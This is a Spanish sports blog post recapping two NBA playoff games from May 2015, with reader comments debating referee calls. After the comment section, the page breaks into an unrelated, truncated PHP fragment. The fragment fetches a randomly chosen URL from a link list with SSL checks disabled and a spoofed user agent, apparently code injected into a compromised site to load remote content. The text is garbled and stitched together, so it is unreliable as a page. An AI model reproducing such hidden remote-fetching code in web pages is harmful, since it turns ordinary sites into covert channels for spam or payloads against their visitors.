La Crónica: Contra viento y marea

11 de May de 2015 por txusma

Los Cavaliers superaron anoche muchas dificultades para acabar alzándose con la victoria. Sin Kevin Love y con Kyrie Irving a medio gas ayer le tocó recibir a Lebron James recibir su ración de lesión en forma de torcedura de tobillo. Aunque todos sabemos que Lebron tendría casi que romperse una pierna para no mantenerse en la pista en un partido como el de ayer. Lo hizo y nos regaló una de las jugadas de la temporada.

En el otro partido del día, DeAndre Jordan tiró 34 tiros libres y los Clippers ganaron de 33. Un fiestón…

Cleveland Cavaliers 86 – Chicago Bulls 84

El marcador lo dice todo. No fue un buen partido especialmente entretenido pero tuvo el mejor de los finales. Y no lo decimos solo por el impresionante buzzer-beater de un Lebron James enrabietado que jugó el último cuarto tocado tras torcerse el tobillo a falta de 3 minutos para el final del tercer cuarto. También lo decimos por la remontada de los Bulls, que perdían de 5 puntos a falta de 30 segundos y fueron capaces de empatar el partido. Primero con un triplazo de Jimmy Butler (a este sí que le van a enseñar dinero este verano), después con un gran 2 vs 1 a Lebron que acabó con falta en ataque del de los Cavs por golpear a Mike Dunleavy y después con una bandejita de Derrick Rose que se sacó de encima Iman Shumpert con suma facilidad. Antes, los Cavs habían sido capaces de remontar los 11 puntos de desventaja que habían llegado a acumular en el tercer cuarto. Con Lebron tocado, con Kyrie Irvring claramente por debajo de sus capacides, sin Kevin Love, sin Varejao… y aún así los Chicago Bulls no son capaces de conseguir la victoria en su propia casa. Malas noticias para Thibodeau. Veremos si Pau Gasol puede jugar el 5º partido y cambia ota vez la dinámica. 

Houston Rockets 95 – LA Clippers 128

Esperemos que nadie se quedara despierto hasta las tantas para presenciar el Rockets-Clippers. Las 2 faltas que cometió Dwight Howard en los primeros compases del juego fueron la excusa perfecta para iniciar el Hack-a-Jordan ya en el primer cuarto. Antes de sentarse por primera vez y en apenas 5 minutos el pívot de LA fue hasta en 14 ocasiones a la línea y en toda la primera parte llegó a intentar 28 tiros libres, récord absoluto en un partido de playoffs. Un auténtico regalo para los espectadores… De todas maneras la táctica parecía funcionarles a los Rockets que se mantenían en el partido gracias un buen Trevor Ariza. En el tercer cuarto cambió el panorama. Un parcial de 21-4 protagonizado por JJ Redick y un liberado DeAndre Jordan que machacaba cada balón un poco más fuerte que el anterior decidió el partido por completo. Por los visitantes solo James Harden y Jason Terry veían algo de aro y los Rockets acabaron completamente frustrados dejando vía libre a la victoria local. El último cuarto fue de nuevo un trámite e incluso Dwight Howard acabó expulsado por faltas personales. Sólo fue capaz de jugar 18 minutos y eso que él no era de los que iba corriendo a hacerle faltas a Jordan.

Comenta

8 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Que increíble (por no decir otra cosa) que no sancionasen a Blatt por invadir la pista pidiendo tiempo muerto para los Cavs cuando no tenían… con empate a 84, hubiera supuesto técnica y posesión Bulls… en fin, esto es la NBA y ya sabemos que hay varios niños mimados.

    Muy mal Bulls en los dos cortocircuitos ofensivos que tuvieron en el 2º y 4º cuarto, creo que sumando ambos parciales puede ser fácilmente un 26-0 para Cavs. Gibson también acabó tocado, veremos.

      Citar

  2. FRANCHO dice:
    #2

    Varejao? en serio es una gran baja lo de Varejao? si estuviese sano, jugaría los minutos de Perkins y no mucho mejor de como lo hace este

      Citar

  3. Jose Luis dice:
    #3

    y qué mala la última defensa de Bulls, acabó de ver la repe con vuestro enlace (gracias 😉 )… uff, a Lebron hay que ponerle dos tíos ahí. Uno por dentro y otro por fuera, Gibson debería haber estado más atento a Lebron que a cubrir el pase de Dellavedova.

      Citar

  4. Blade Petrovic dice:
    #4

    Es cierto que Blatt pide tiempo muerto, pero en esa jugada hay una posible falta a LeBron por parte de Noah que hubiera decidido el partido igualmente

      Citar

  5. Jose Luis dice:
    #5

    Si pide tiempo y pitan tecnica, ya sería bola de Bulls. ¿O la falta fue antes de pedir el tiempo? No la he visto.

    El tiempo lo pide justo tras la canasta de Rose, antes de atacar Cavs, que es cuando supongo dirás que hay falta de Noah.

      Citar

  6. HisRoyalAirness dice:
    #6

    Es técnica de toda la vida, posibles faltas hay siempre y más en la zona.

      Citar

  7. Jose Luis dice:
    #7

    Reconocido por la NBA… estuvieron viendo encima una replay para no sé qué… dándoles un time-out extra a los Cavs, pues ya podían haber revisado lo de Blatt.

    En fin… ya se sabe como va esto

      Citar

  8. TheDeerHunter dice:
    #8

    Q le pregunten a Chris Webber a ver q opina de eso

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>